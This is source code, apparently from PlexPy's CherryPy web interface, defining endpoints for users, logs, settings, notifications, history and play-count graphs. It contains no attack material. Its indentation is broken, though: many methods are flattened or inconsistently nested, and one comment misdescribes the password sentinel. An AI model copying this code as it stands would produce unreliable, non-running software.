def edit_user_dialog(self, user=None, user_id=None, **kwargs):
user_data = users.Users()
if user_id:
result = user_data.get_user_friendly_name(user_id=user_id)
status_message = ''
elif user:
result = user_data.get_user_friendly_name(user=user)
status_message = ''
else:
result = None
status_message = 'An error occured.'
return serve_template(templatename="edit_user.html", title="Edit User", data=result, status_message=status_message)
@cherrypy.expose
def edit_user(self, user=None, user_id=None, friendly_name=None, **kwargs):
if 'do_notify' in kwargs:
do_notify = kwargs.get('do_notify')
else:
do_notify = 0
if 'keep_history' in kwargs:
keep_history = kwargs.get('keep_history')
else:
keep_history = 0
if 'thumb' in kwargs:
custom_avatar = kwargs['thumb']
else:
custom_avatar = ''
user_data = users.Users()
if user_id:
try:
user_data.set_user_friendly_name(user_id=user_id,
friendly_name=friendly_name,
do_notify=do_notify,
keep_history=keep_history)
user_data.set_user_profile_url(user_id=user_id,
profile_url=custom_avatar)
status_message = "Successfully updated user."
return status_message
except:
status_message = "Failed to update user."
return status_message
if user:
try:
user_data.set_user_friendly_name(user=user,
friendly_name=friendly_name,
do_notify=do_notify,
keep_history=keep_history)
user_data.set_user_profile_url(user=user,
profile_url=custom_avatar)
status_message = "Successfully updated user."
return status_message
except:
status_message = "Failed to update user."
return status_message
@cherrypy.expose
def get_stream_data(self, row_id=None, user=None, **kwargs):
data_factory = datafactory.DataFactory()
stream_data = data_factory.get_stream_details(row_id)
return serve_template(templatename="stream_data.html", title="Stream Data", data=stream_data, user=user)
@cherrypy.expose
def get_ip_address_details(self, ip_address=None, **kwargs):
import socket
try:
socket.inet_aton(ip_address)
except socket.error:
ip_address = None
return serve_template(templatename="ip_address_modal.html", title="IP Address Details", data=ip_address)
@cherrypy.expose
def get_user_list(self, **kwargs):
user_data = users.Users()
user_list = user_data.get_user_list(kwargs=kwargs)
cherrypy.response.headers['Content-type'] = 'application/json'
return json.dumps(user_list)
    @cherrypy.expose
    def checkGithub(self):
        """Run a version check against GitHub, then redirect home."""
        from plexpy import versioncheck

        versioncheck.checkGithub()
        raise cherrypy.HTTPRedirect("home")
    @cherrypy.expose
    def logs(self):
        """Render the web log viewer page from the in-memory log list."""
        return serve_template(templatename="logs.html", title="Log", lineList=plexpy.LOG_LIST)
    @cherrypy.expose
    def clearLogs(self):
        """Empty the in-memory web log list and return to the log page."""
        plexpy.LOG_LIST = []
        logger.info("Web logs cleared")
        raise cherrypy.HTTPRedirect("logs")
    @cherrypy.expose
    def toggleVerbose(self):
        """Flip verbose logging on/off and re-initialise the logger."""
        plexpy.VERBOSE = not plexpy.VERBOSE
        logger.initLogger(console=not plexpy.QUIET,
                          log_dir=plexpy.CONFIG.LOG_DIR, verbose=plexpy.VERBOSE)
        logger.info("Verbose toggled, set to %s", plexpy.VERBOSE)
        logger.debug("If you read this message, debug logging is available")
        raise cherrypy.HTTPRedirect("logs")
@cherrypy.expose
def getLog(self, start=0, length=100, **kwargs):
start = int(start)
length = int(length)
search_value = ""
search_regex = ""
order_column = 0
order_dir = "desc"
if 'order[0][dir]' in kwargs:
order_dir = kwargs.get('order[0][dir]', "desc")
if 'order[0][column]' in kwargs:
order_column = kwargs.get('order[0][column]', "0")
if 'search[value]' in kwargs:
search_value = kwargs.get('search[value]', "")
if 'search[regex]' in kwargs:
search_regex = kwargs.get('search[regex]', "")
filtered = []
if search_value == "":
filtered = plexpy.LOG_LIST[::]
else:
filtered = [row for row in plexpy.LOG_LIST for column in row if search_value.lower() in column.lower()]
sortcolumn = 0
if order_column == '1':
sortcolumn = 2
elif order_column == '2':
sortcolumn = 1
filtered.sort(key=lambda x: x[sortcolumn], reverse=order_dir == "desc")
rows = filtered[start:(start + length)]
rows = [[row[0], row[2], row[1]] for row in rows]
return json.dumps({
'recordsFiltered': len(filtered),
'recordsTotal': len(plexpy.LOG_LIST),
'data': rows,
})
@cherrypy.expose
def get_plex_log(self, window=1000, **kwargs):
log_lines = []
try:
log_lines = {'data': log_reader.get_log_tail(window=window)}
except:
logger.warn("Unable to retrieve Plex Logs.")
cherrypy.response.headers['Content-type'] = 'application/json'
return json.dumps(log_lines)
@cherrypy.expose
def generateAPI(self):
apikey = hashlib.sha224(str(random.getrandbits(256))).hexdigest()[0:32]
logger.info("New API generated")
return apikey
@cherrypy.expose
def settings(self):
    """Render the settings page, populated from the live configuration."""
    interface_dir = os.path.join(plexpy.PROG_DIR, 'data/interfaces/')
    interface_list = [name for name in os.listdir(interface_dir) if
                      os.path.isdir(os.path.join(interface_dir, name))]

    # Initialise blank passwords so we do not expose them in the html forms
    # but users are still able to clear them.  A single space is the
    # sentinel configUpdate() uses to mean "keep the stored password".
    if plexpy.CONFIG.HTTP_PASSWORD != '':
        http_password = '    '
    else:
        http_password = ''

    # Flat dict consumed by the settings.html template; checked() renders
    # boolean config values as checkbox attributes.
    config = {
        "http_host": plexpy.CONFIG.HTTP_HOST,
        "http_username": plexpy.CONFIG.HTTP_USERNAME,
        "http_port": plexpy.CONFIG.HTTP_PORT,
        "http_password": http_password,
        "launch_browser": checked(plexpy.CONFIG.LAUNCH_BROWSER),
        "enable_https": checked(plexpy.CONFIG.ENABLE_HTTPS),
        "https_cert": plexpy.CONFIG.HTTPS_CERT,
        "https_key": plexpy.CONFIG.HTTPS_KEY,
        "api_enabled": checked(plexpy.CONFIG.API_ENABLED),
        "api_key": plexpy.CONFIG.API_KEY,
        "update_db_interval": plexpy.CONFIG.UPDATE_DB_INTERVAL,
        "freeze_db": checked(plexpy.CONFIG.FREEZE_DB),
        "log_dir": plexpy.CONFIG.LOG_DIR,
        "cache_dir": plexpy.CONFIG.CACHE_DIR,
        "check_github": checked(plexpy.CONFIG.CHECK_GITHUB),
        "interface_list": interface_list,
        "growl_enabled": checked(plexpy.CONFIG.GROWL_ENABLED),
        "growl_host": plexpy.CONFIG.GROWL_HOST,
        "growl_password": plexpy.CONFIG.GROWL_PASSWORD,
        "prowl_enabled": checked(plexpy.CONFIG.PROWL_ENABLED),
        "prowl_keys": plexpy.CONFIG.PROWL_KEYS,
        "prowl_priority": plexpy.CONFIG.PROWL_PRIORITY,
        "xbmc_enabled": checked(plexpy.CONFIG.XBMC_ENABLED),
        "xbmc_host": plexpy.CONFIG.XBMC_HOST,
        "xbmc_username": plexpy.CONFIG.XBMC_USERNAME,
        "xbmc_password": plexpy.CONFIG.XBMC_PASSWORD,
        "plex_enabled": checked(plexpy.CONFIG.PLEX_ENABLED),
        "plex_client_host": plexpy.CONFIG.PLEX_CLIENT_HOST,
        "plex_username": plexpy.CONFIG.PLEX_USERNAME,
        "plex_password": plexpy.CONFIG.PLEX_PASSWORD,
        "nma_enabled": checked(plexpy.CONFIG.NMA_ENABLED),
        "nma_apikey": plexpy.CONFIG.NMA_APIKEY,
        "nma_priority": int(plexpy.CONFIG.NMA_PRIORITY),
        "pushalot_enabled": checked(plexpy.CONFIG.PUSHALOT_ENABLED),
        "pushalot_apikey": plexpy.CONFIG.PUSHALOT_APIKEY,
        "pushover_enabled": checked(plexpy.CONFIG.PUSHOVER_ENABLED),
        "pushover_keys": plexpy.CONFIG.PUSHOVER_KEYS,
        "pushover_apitoken": plexpy.CONFIG.PUSHOVER_APITOKEN,
        "pushover_priority": plexpy.CONFIG.PUSHOVER_PRIORITY,
        "pushbullet_enabled": checked(plexpy.CONFIG.PUSHBULLET_ENABLED),
        "pushbullet_apikey": plexpy.CONFIG.PUSHBULLET_APIKEY,
        "pushbullet_deviceid": plexpy.CONFIG.PUSHBULLET_DEVICEID,
        "twitter_enabled": checked(plexpy.CONFIG.TWITTER_ENABLED),
        "osx_notify_enabled": checked(plexpy.CONFIG.OSX_NOTIFY_ENABLED),
        "osx_notify_app": plexpy.CONFIG.OSX_NOTIFY_APP,
        "boxcar_enabled": checked(plexpy.CONFIG.BOXCAR_ENABLED),
        "boxcar_token": plexpy.CONFIG.BOXCAR_TOKEN,
        "cache_sizemb": plexpy.CONFIG.CACHE_SIZEMB,
        "email_enabled": checked(plexpy.CONFIG.EMAIL_ENABLED),
        "email_from": plexpy.CONFIG.EMAIL_FROM,
        "email_to": plexpy.CONFIG.EMAIL_TO,
        "email_smtp_server": plexpy.CONFIG.EMAIL_SMTP_SERVER,
        "email_smtp_user": plexpy.CONFIG.EMAIL_SMTP_USER,
        "email_smtp_password": plexpy.CONFIG.EMAIL_SMTP_PASSWORD,
        "email_smtp_port": int(plexpy.CONFIG.EMAIL_SMTP_PORT),
        "email_tls": checked(plexpy.CONFIG.EMAIL_TLS),
        "pms_identifier": plexpy.CONFIG.PMS_IDENTIFIER,
        "pms_ip": plexpy.CONFIG.PMS_IP,
        "pms_logs_folder": plexpy.CONFIG.PMS_LOGS_FOLDER,
        "pms_port": plexpy.CONFIG.PMS_PORT,
        "pms_token": plexpy.CONFIG.PMS_TOKEN,
        "pms_ssl": checked(plexpy.CONFIG.PMS_SSL),
        "pms_use_bif": checked(plexpy.CONFIG.PMS_USE_BIF),
        "pms_uuid": plexpy.CONFIG.PMS_UUID,
        "plexwatch_database": plexpy.CONFIG.PLEXWATCH_DATABASE,
        "date_format": plexpy.CONFIG.DATE_FORMAT,
        "time_format": plexpy.CONFIG.TIME_FORMAT,
        "grouping_global_history": checked(plexpy.CONFIG.GROUPING_GLOBAL_HISTORY),
        "grouping_user_history": checked(plexpy.CONFIG.GROUPING_USER_HISTORY),
        "grouping_charts": checked(plexpy.CONFIG.GROUPING_CHARTS),
        "tv_notify_enable": checked(plexpy.CONFIG.TV_NOTIFY_ENABLE),
        "movie_notify_enable": checked(plexpy.CONFIG.MOVIE_NOTIFY_ENABLE),
        "music_notify_enable": checked(plexpy.CONFIG.MUSIC_NOTIFY_ENABLE),
        "tv_notify_on_start": checked(plexpy.CONFIG.TV_NOTIFY_ON_START),
        "movie_notify_on_start": checked(plexpy.CONFIG.MOVIE_NOTIFY_ON_START),
        "music_notify_on_start": checked(plexpy.CONFIG.MUSIC_NOTIFY_ON_START),
        "tv_notify_on_stop": checked(plexpy.CONFIG.TV_NOTIFY_ON_STOP),
        "movie_notify_on_stop": checked(plexpy.CONFIG.MOVIE_NOTIFY_ON_STOP),
        "music_notify_on_stop": checked(plexpy.CONFIG.MUSIC_NOTIFY_ON_STOP),
        "tv_notify_on_pause": checked(plexpy.CONFIG.TV_NOTIFY_ON_PAUSE),
        "movie_notify_on_pause": checked(plexpy.CONFIG.MOVIE_NOTIFY_ON_PAUSE),
        "music_notify_on_pause": checked(plexpy.CONFIG.MUSIC_NOTIFY_ON_PAUSE),
        "monitoring_interval": plexpy.CONFIG.MONITORING_INTERVAL,
        "refresh_users_interval": plexpy.CONFIG.REFRESH_USERS_INTERVAL,
        "refresh_users_on_startup": checked(plexpy.CONFIG.REFRESH_USERS_ON_STARTUP),
        "ip_logging_enable": checked(plexpy.CONFIG.IP_LOGGING_ENABLE),
        "video_logging_enable": checked(plexpy.CONFIG.VIDEO_LOGGING_ENABLE),
        "music_logging_enable": checked(plexpy.CONFIG.MUSIC_LOGGING_ENABLE),
        "logging_ignore_interval": plexpy.CONFIG.LOGGING_IGNORE_INTERVAL,
        "pms_is_remote": checked(plexpy.CONFIG.PMS_IS_REMOTE),
        "notify_watched_percent": plexpy.CONFIG.NOTIFY_WATCHED_PERCENT,
        "notify_on_start_subject_text": plexpy.CONFIG.NOTIFY_ON_START_SUBJECT_TEXT,
        "notify_on_start_body_text": plexpy.CONFIG.NOTIFY_ON_START_BODY_TEXT,
        "notify_on_stop_subject_text": plexpy.CONFIG.NOTIFY_ON_STOP_SUBJECT_TEXT,
        "notify_on_stop_body_text": plexpy.CONFIG.NOTIFY_ON_STOP_BODY_TEXT,
        "notify_on_pause_subject_text": plexpy.CONFIG.NOTIFY_ON_PAUSE_SUBJECT_TEXT,
        "notify_on_pause_body_text": plexpy.CONFIG.NOTIFY_ON_PAUSE_BODY_TEXT,
        "notify_on_resume_subject_text": plexpy.CONFIG.NOTIFY_ON_RESUME_SUBJECT_TEXT,
        "notify_on_resume_body_text": plexpy.CONFIG.NOTIFY_ON_RESUME_BODY_TEXT,
        "notify_on_buffer_subject_text": plexpy.CONFIG.NOTIFY_ON_BUFFER_SUBJECT_TEXT,
        "notify_on_buffer_body_text": plexpy.CONFIG.NOTIFY_ON_BUFFER_BODY_TEXT,
        "notify_on_watched_subject_text": plexpy.CONFIG.NOTIFY_ON_WATCHED_SUBJECT_TEXT,
        "notify_on_watched_body_text": plexpy.CONFIG.NOTIFY_ON_WATCHED_BODY_TEXT,
        "home_stats_length": plexpy.CONFIG.HOME_STATS_LENGTH,
        "home_stats_type": checked(plexpy.CONFIG.HOME_STATS_TYPE),
        "home_stats_count": plexpy.CONFIG.HOME_STATS_COUNT,
        "buffer_threshold": plexpy.CONFIG.BUFFER_THRESHOLD,
        "buffer_wait": plexpy.CONFIG.BUFFER_WAIT
    }

    return serve_template(templatename="settings.html", title="Settings", config=config)
@cherrypy.expose
def configUpdate(self, **kwargs):
    """Persist settings posted from the settings form and apply side effects.

    Re-schedules the monitor when intervals change, refreshes the users
    table when the PMS IP changes, and redirects back to the settings page.
    """
    # Handle the variable config options. Note - keys with False values aren't getting passed
    checked_configs = [
        "launch_browser", "enable_https", "api_enabled", "freeze_db", "growl_enabled",
        "prowl_enabled", "xbmc_enabled", "check_github",
        "plex_enabled", "nma_enabled", "pushalot_enabled",
        "pushover_enabled", "pushbullet_enabled",
        "twitter_enabled", "osx_notify_enabled",
        "boxcar_enabled", "email_enabled", "email_tls",
        "grouping_global_history", "grouping_user_history", "grouping_charts", "pms_use_bif", "pms_ssl",
        "tv_notify_enable", "movie_notify_enable", "music_notify_enable",
        "tv_notify_on_start", "movie_notify_on_start", "music_notify_on_start",
        "tv_notify_on_stop", "movie_notify_on_stop", "music_notify_on_stop",
        "tv_notify_on_pause", "movie_notify_on_pause", "music_notify_on_pause", "refresh_users_on_startup",
        "ip_logging_enable", "video_logging_enable", "music_logging_enable", "pms_is_remote", "home_stats_type"
    ]
    for checked_config in checked_configs:
        if checked_config not in kwargs:
            # checked items should be zero or one. if they were not sent then the item was not checked
            kwargs[checked_config] = 0

    # If http password exists in config, do not overwrite when blank value received
    # (settings() sends a single space as the "unchanged" sentinel).
    if 'http_password' in kwargs:
        if kwargs['http_password'] == '    ' and plexpy.CONFIG.HTTP_PASSWORD != '':
            kwargs['http_password'] = plexpy.CONFIG.HTTP_PASSWORD

    for plain_config, use_config in [(x[4:], x) for x in kwargs if x.startswith('use_')]:
        # the use prefix is fairly nice in the html, but does not match the actual config
        kwargs[plain_config] = kwargs[use_config]
        del kwargs[use_config]

    # Check if we should refresh our data
    refresh_users = False
    reschedule = False

    if 'monitoring_interval' in kwargs and 'refresh_users_interval' in kwargs:
        if (kwargs['monitoring_interval'] != str(plexpy.CONFIG.MONITORING_INTERVAL)) or \
                (kwargs['refresh_users_interval'] != str(plexpy.CONFIG.REFRESH_USERS_INTERVAL)):
            reschedule = True

    if 'pms_ip' in kwargs:
        if kwargs['pms_ip'] != plexpy.CONFIG.PMS_IP:
            refresh_users = True

    plexpy.CONFIG.process_kwargs(kwargs)

    # Write the config
    plexpy.CONFIG.write()

    # Get new server URLs for SSL communications.
    plextv.get_real_pms_url()

    # Reconfigure scheduler if intervals changed
    if reschedule:
        plexpy.initialize_scheduler()

    # Refresh users table if our server IP changes.
    if refresh_users:
        threading.Thread(target=plextv.refresh_users).start()

    raise cherrypy.HTTPRedirect("settings")
@cherrypy.expose
def set_notification_config(self, **kwargs):
    """Persist notification-agent settings posted from the config modal."""
    # Unchecked checkboxes are not submitted at all, so default them to 0.
    for checkbox in ("email_tls",):
        if checkbox not in kwargs:
            kwargs[checkbox] = 0

    # The html form uses a 'use_' prefix that the config schema does not;
    # rename those keys in place.
    for prefixed in [key for key in kwargs if key.startswith('use_')]:
        kwargs[prefixed[4:]] = kwargs.pop(prefixed)

    plexpy.CONFIG.process_kwargs(kwargs)
    plexpy.CONFIG.write()

    cherrypy.response.status = 200
@cherrypy.expose
def do_state_change(self, signal, title, timer):
    """Set the process signal (shutdown/restart/update) and render the countdown page."""
    message = title
    quote = self.random_arnold_quotes()
    # The main loop polls plexpy.SIGNAL and acts on it.
    plexpy.SIGNAL = signal
    return serve_template(templatename="shutdown.html", title=title,
                          message=message, timer=timer, quote=quote)
@cherrypy.expose
def get_history(self, user=None, user_id=None, **kwargs):
    """DataTables endpoint: watch history as JSON, optionally constrained.

    When several filters are supplied the later one wins: user/user_id,
    then rating_key, parent_rating_key, grandparent_rating_key, start_date.
    """
    custom_where = []
    if user_id:
        custom_where = [['user_id', user_id]]
    elif user:
        custom_where = [['user', user]]
    if 'rating_key' in kwargs:
        custom_where = [['rating_key', kwargs.get('rating_key', "")]]
    if 'parent_rating_key' in kwargs:
        custom_where = [['parent_rating_key', kwargs.get('parent_rating_key', "")]]
    if 'grandparent_rating_key' in kwargs:
        custom_where = [['grandparent_rating_key', kwargs.get('grandparent_rating_key', "")]]
    if 'start_date' in kwargs:
        custom_where = [['strftime("%Y-%m-%d", datetime(date, "unixepoch", "localtime"))',
                         kwargs.get('start_date', "")]]

    history = datafactory.DataFactory().get_history(kwargs=kwargs, custom_where=custom_where)

    cherrypy.response.headers['Content-type'] = 'application/json'
    return json.dumps(history)
@cherrypy.expose
def history_table_modal(self, start_date=None, **kwargs):
    """Render the history-table modal for a given start date."""
    return serve_template(templatename="history_table_modal.html", title="History Data", data=start_date)
@cherrypy.expose
def shutdown(self):
    """Signal a shutdown and render the countdown page."""
    return self.do_state_change('shutdown', 'Shutting Down', 15)
@cherrypy.expose
def restart(self):
    """Signal a restart and render the countdown page."""
    return self.do_state_change('restart', 'Restarting', 30)
@cherrypy.expose
def update(self):
    """Signal an update and render the countdown page."""
    return self.do_state_change('update', 'Updating', 120)
@cherrypy.expose
def api(self, *args, **kwargs):
    """Dispatch an API request to plexpy.api.Api and return its payload."""
    from plexpy.api import Api

    a = Api()
    a.checkParams(*args, **kwargs)

    return a.fetchData()
@cherrypy.expose
def twitterStep1(self):
    """Begin the Twitter OAuth flow; returns the authorization URL."""
    cherrypy.response.headers['Cache-Control'] = "max-age=0,no-cache,no-store"
    tweet = notifiers.TwitterNotifier()
    return tweet._get_authorization()
@cherrypy.expose
def twitterStep2(self, key):
    """Complete the Twitter OAuth flow by verifying the user-supplied key."""
    cherrypy.response.headers['Cache-Control'] = "max-age=0,no-cache,no-store"
    verified = notifiers.TwitterNotifier()._get_credentials(key)
    logger.info(u"result: " + str(verified))
    if verified:
        return "Key verification successful"
    return "Unable to verify key"
@cherrypy.expose
def testTwitter(self):
    """Send a test tweet and report the outcome as plain text."""
    cherrypy.response.headers['Cache-Control'] = "max-age=0,no-cache,no-store"
    sent = notifiers.TwitterNotifier().test_notify()
    if sent:
        return "Tweet successful, check your twitter to make sure it worked"
    return "Error sending tweet"
@cherrypy.expose
def osxnotifyregister(self, app):
    """Register an application for OS X notifications and send a test one."""
    cherrypy.response.headers['Cache-Control'] = "max-age=0,no-cache,no-store"
    from osxnotify import registerapp as osxnotify

    result, msg = osxnotify.registerapp(app)
    if result:
        osx_notify = notifiers.OSX_NOTIFY()
        osx_notify.notify('Registered', result, 'Success :-)')
        logger.info('Registered %s, to re-register a different app, delete this app first' % result)
    else:
        logger.warn(msg)
    return msg
@cherrypy.expose
def get_pms_token(self):
    """Fetch a Plex.tv auth token; returns False (with a warning) on failure."""
    fetched = plextv.PlexTV().get_token()
    if not fetched:
        logger.warn('Unable to retrieve Plex.tv token.')
        return False
    return fetched
@cherrypy.expose
def get_pms_sessions_json(self, **kwargs):
    """Relay the current PMS sessions as JSON; False (with a warning) on failure."""
    payload = pmsconnect.PmsConnect().get_sessions('json')
    if not payload:
        logger.warn('Unable to retrieve data.')
        return False
    cherrypy.response.headers['Content-type'] = 'application/json'
    return payload
@cherrypy.expose
def get_current_activity(self, **kwargs):
    """Render the current-activity fragment with live PMS session data."""
    try:
        pms_connect = pmsconnect.PmsConnect()
        result = pms_connect.get_current_activity()
    except Exception:
        # Narrowed from a bare ``except:`` so SystemExit/KeyboardInterrupt
        # propagate; any fetch failure still renders the empty fragment.
        return serve_template(templatename="current_activity.html", data=None)

    if result:
        return serve_template(templatename="current_activity.html", data=result)
    logger.warn('Unable to retrieve data.')
    return serve_template(templatename="current_activity.html", data=None)
@cherrypy.expose
def get_current_activity_header(self, **kwargs):
    """Render the stream-count header fragment for the homepage."""
    try:
        activity = pmsconnect.PmsConnect().get_current_activity()
    except IOError:
        return serve_template(templatename="current_activity_header.html", data=None)

    if not activity:
        logger.warn('Unable to retrieve data.')
        return serve_template(templatename="current_activity_header.html", data=None)
    return serve_template(templatename="current_activity_header.html",
                          data=activity['stream_count'])
@cherrypy.expose
def get_recently_added(self, count='0', **kwargs):
    """Render the recently-added fragment with up to *count* items."""
    try:
        details = pmsconnect.PmsConnect().get_recently_added_details(count)
    except IOError:
        return serve_template(templatename="recently_added.html", data=None)

    if not details:
        logger.warn('Unable to retrieve data.')
        return serve_template(templatename="recently_added.html", data=None)
    return serve_template(templatename="recently_added.html",
                          data=details['recently_added'])
@cherrypy.expose
def pms_image_proxy(self, img='', width='0', height='0', fallback=None, **kwargs):
    """Proxy an image from the Plex server.

    On failure, optionally serves a bundled poster/cover thumbnail when
    ``fallback`` is 'poster' or 'cover'; otherwise returns None.
    """
    try:
        pms_connect = pmsconnect.PmsConnect()
        result = pms_connect.get_image(img, width, height)
        cherrypy.response.headers['Content-type'] = result[1]
        return result[0]
    except Exception:
        # Narrowed from a bare ``except:`` so interpreter-exit exceptions
        # are no longer swallowed.
        logger.warn('Image proxy queried but errors occured.')
        if fallback == 'poster':
            logger.info('Trying fallback image...')
            try:
                # NOTE(review): self.interface_dir is not assigned anywhere
                # visible in this class (settings() uses a local variable) --
                # confirm it exists, otherwise this raises AttributeError
                # and the fallback is never served.
                fallback_image = open(self.interface_dir + common.DEFAULT_POSTER_THUMB, 'rb')
                cherrypy.response.headers['Content-type'] = 'image/png'
                return fallback_image
            except IOError as e:
                logger.error('Unable to read fallback image. %s' % e)
        elif fallback == 'cover':
            logger.info('Trying fallback image...')
            try:
                fallback_image = open(self.interface_dir + common.DEFAULT_COVER_THUMB, 'rb')
                cherrypy.response.headers['Content-type'] = 'image/png'
                return fallback_image
            except IOError as e:
                logger.error('Unable to read fallback image. %s' % e)

        return None
@cherrypy.expose
def info(self, item_id=None, source=None, **kwargs):
    """Render the media info page from history or live PMS metadata."""
    config = {
        "pms_identifier": plexpy.CONFIG.PMS_IDENTIFIER
    }

    metadata = None
    if source == 'history':
        metadata = datafactory.DataFactory().get_metadata_details(row_id=item_id)
    else:
        lookup = pmsconnect.PmsConnect().get_metadata_details(rating_key=item_id)
        if lookup:
            metadata = lookup['metadata']

    if not metadata:
        logger.warn('Unable to retrieve data.')
        return serve_template(templatename="info.html", data=None, title="Info")
    return serve_template(templatename="info.html", data=metadata, title="Info", config=config)
@cherrypy.expose
def get_user_recently_watched(self, user=None, user_id=None, limit='10', **kwargs):
    """Render the recently-watched fragment for a user."""
    watched = datafactory.DataFactory().get_recently_watched(user_id=user_id,
                                                             user=user, limit=limit)
    if not watched:
        logger.warn('Unable to retrieve data.')
        return serve_template(templatename="user_recently_watched.html", data=None,
                              title="Recently Watched")
    return serve_template(templatename="user_recently_watched.html", data=watched,
                          title="Recently Watched")
@cherrypy.expose
def get_user_watch_time_stats(self, user=None, user_id=None, **kwargs):
    """Render the watch-time statistics fragment for a user."""
    stats = users.Users().get_user_watch_time_stats(user_id=user_id, user=user)
    if not stats:
        logger.warn('Unable to retrieve data.')
        return serve_template(templatename="user_watch_time_stats.html", data=None, title="Watch Stats")
    return serve_template(templatename="user_watch_time_stats.html", data=stats, title="Watch Stats")
@cherrypy.expose
def get_user_platform_stats(self, user=None, user_id=None, **kwargs):
    """Render the platform statistics fragment for a user."""
    stats = users.Users().get_user_platform_stats(user_id=user_id, user=user)
    if not stats:
        logger.warn('Unable to retrieve data.')
        return serve_template(templatename="user_platform_stats.html", data=None, title="Platform Stats")
    return serve_template(templatename="user_platform_stats.html", data=stats,
                          title="Platform Stats")
@cherrypy.expose
def get_item_children(self, rating_key='', **kwargs):
    """Render the children list fragment for a media item."""
    children = pmsconnect.PmsConnect().get_item_children(rating_key)
    if not children:
        logger.warn('Unable to retrieve data.')
        return serve_template(templatename="info_children_list.html", data=None, title="Children List")
    return serve_template(templatename="info_children_list.html", data=children, title="Children List")
@cherrypy.expose
def get_metadata_json(self, rating_key='', **kwargs):
    """Relay PMS metadata for an item as JSON; None (with a warning) on failure."""
    payload = pmsconnect.PmsConnect().get_metadata(rating_key, 'json')
    if not payload:
        logger.warn('Unable to retrieve data.')
        return None
    cherrypy.response.headers['Content-type'] = 'application/json'
    return payload
@cherrypy.expose
def get_metadata_xml(self, rating_key='', **kwargs):
    """Relay PMS metadata for an item as XML; None (with a warning) on failure."""
    payload = pmsconnect.PmsConnect().get_metadata(rating_key)
    if not payload:
        logger.warn('Unable to retrieve data.')
        return None
    cherrypy.response.headers['Content-type'] = 'application/xml'
    return payload
@cherrypy.expose
def get_recently_added_json(self, count='0', **kwargs):
    """Relay the PMS recently-added list as JSON; None (with a warning) on failure."""
    payload = pmsconnect.PmsConnect().get_recently_added(count, 'json')
    if not payload:
        logger.warn('Unable to retrieve data.')
        return None
    cherrypy.response.headers['Content-type'] = 'application/json'
    return payload
@cherrypy.expose
def get_episode_list_json(self, rating_key='', **kwargs):
    """Relay a show's episode list as JSON; None (with a warning) on failure."""
    payload = pmsconnect.PmsConnect().get_episode_list(rating_key, 'json')
    if not payload:
        logger.warn('Unable to retrieve data.')
        return None
    cherrypy.response.headers['Content-type'] = 'application/json'
    return payload
@cherrypy.expose
def get_user_ips(self, user_id=None, user=None, **kwargs):
    """DataTables endpoint: unique IP addresses recorded for a user."""
    if user_id:
        constraint = [['user_id', user_id]]
    elif user:
        constraint = [['user', user]]
    else:
        constraint = []

    history = users.Users().get_user_unique_ips(kwargs=kwargs,
                                                custom_where=constraint)

    cherrypy.response.headers['Content-type'] = 'application/json'
    return json.dumps(history)
@cherrypy.expose
def get_plays_by_date(self, time_range='30', y_axis='plays', **kwargs):
    """Graph data: total plays per day, as JSON; None (with a warning) on failure."""
    data = graphs.Graphs().get_total_plays_per_day(time_range=time_range, y_axis=y_axis)
    if not data:
        logger.warn('Unable to retrieve data.')
        return None
    cherrypy.response.headers['Content-type'] = 'application/json'
    return json.dumps(data)
@cherrypy.expose
def get_plays_by_dayofweek(self, time_range='30', y_axis='plays', **kwargs):
    """Graph data: total plays per day of week, as JSON; None (with a warning) on failure."""
    data = graphs.Graphs().get_total_plays_per_dayofweek(time_range=time_range, y_axis=y_axis)
    if not data:
        logger.warn('Unable to retrieve data.')
        return None
    cherrypy.response.headers['Content-type'] = 'application/json'
    return json.dumps(data)
@cherrypy.expose
def get_plays_by_hourofday(self, time_range='30', y_axis='plays', **kwargs):
    """Graph data: total plays per hour of day, as JSON; None (with a warning) on failure."""
    data = graphs.Graphs().get_total_plays_per_hourofday(time_range=time_range, y_axis=y_axis)
    if not data:
        logger.warn('Unable to retrieve data.')
        return None
    cherrypy.response.headers['Content-type'] = 'application/json'
    return json.dumps(data)
@cherrypy.expose
def get_plays_per_month(self, y_axis='plays', **kwargs):
    """Graph data: total plays per month, as JSON; None (with a warning) on failure."""
    data = graphs.Graphs().get_total_plays_per_month(y_axis=y_axis)
    if not data:
        logger.warn('Unable to retrieve data.')
        return None
    cherrypy.response.headers['Content-type'] = 'application/json'
    return json.dumps(data)
@cherrypy.expose
def get_plays_by_top_10_platforms(self, time_range='30', y_axis='plays', **kwargs):
    """Graph data: plays by top-10 platforms, as JSON; None (with a warning) on failure."""
    data = graphs.Graphs().get_total_plays_by_top_10_platforms(time_range=time_range, y_axis=y_axis)
    if not data:
        logger.warn('Unable to retrieve data.')
        return None
    cherrypy.response.headers['Content-type'] = 'application/json'
    return json.dumps(data)
@cherrypy.expose
def get_plays_by_top_10_users(self, time_range='30', y_axis='plays', **kwargs):
    """Graph data: plays by top-10 users, as JSON; None (with a warning) on failure."""
    data = graphs.Graphs().get_total_plays_by_top_10_users(time_range=time_range, y_axis=y_axis)
    if not data:
        logger.warn('Unable to retrieve data.')
        return None
    cherrypy.response.headers['Content-type'] = 'application/json'
    return json.dumps(data)
@cherrypy.expose
def get_plays_by_stream_type(self, time_range='30', y_axis='plays', **kwargs):
    """Graph data: plays per stream type, as JSON; None (with a warning) on failure."""
    data = graphs.Graphs().get_total_plays_per_stream_type(time_range=time_range, y_axis=y_axis)
    if not data:
        logger.warn('Unable to retrieve data.')
        return None
    cherrypy.response.headers['Content-type'] = 'application/json'
    return json.dumps(data)
@cherrypy.expose
def get_plays_by_source_resolution(self, time_range='30', y_axis='plays', **kwargs):
    """Graph data: plays by source resolution, as JSON; None (with a warning) on failure."""
    data = graphs.Graphs().get_total_plays_by_source_resolution(time_range=time_range, y_axis=y_axis)
    if not data:
        logger.warn('Unable to retrieve data.')
        return None
    cherrypy.response.headers['Content-type'] = 'application/json'
    return json.dumps(data)
@cherrypy.expose
def get_plays_by_stream_resolution(self, time_range='30', y_axis='plays', **kwargs):
    """Graph data: plays by stream resolution, as JSON; None (with a warning) on failure."""
    data = graphs.Graphs().get_total_plays_by_stream_resolution(time_range=time_range, y_axis=y_axis)
    if not data:
        logger.warn('Unable to retrieve data.')
        return None
    cherrypy.response.headers['Content-type'] = 'application/json'
    return json.dumps(data)
@cherrypy.expose
def get_stream_type_by_top_10_users(self, time_range='30', y_axis='plays', **kwargs):
    """Graph data: stream types of top-10 users, as JSON; None (with a warning) on failure."""
    data = graphs.Graphs().get_stream_type_by_top_10_users(time_range=time_range, y_axis=y_axis)
    if not data:
        logger.warn('Unable to retrieve data.')
        return None
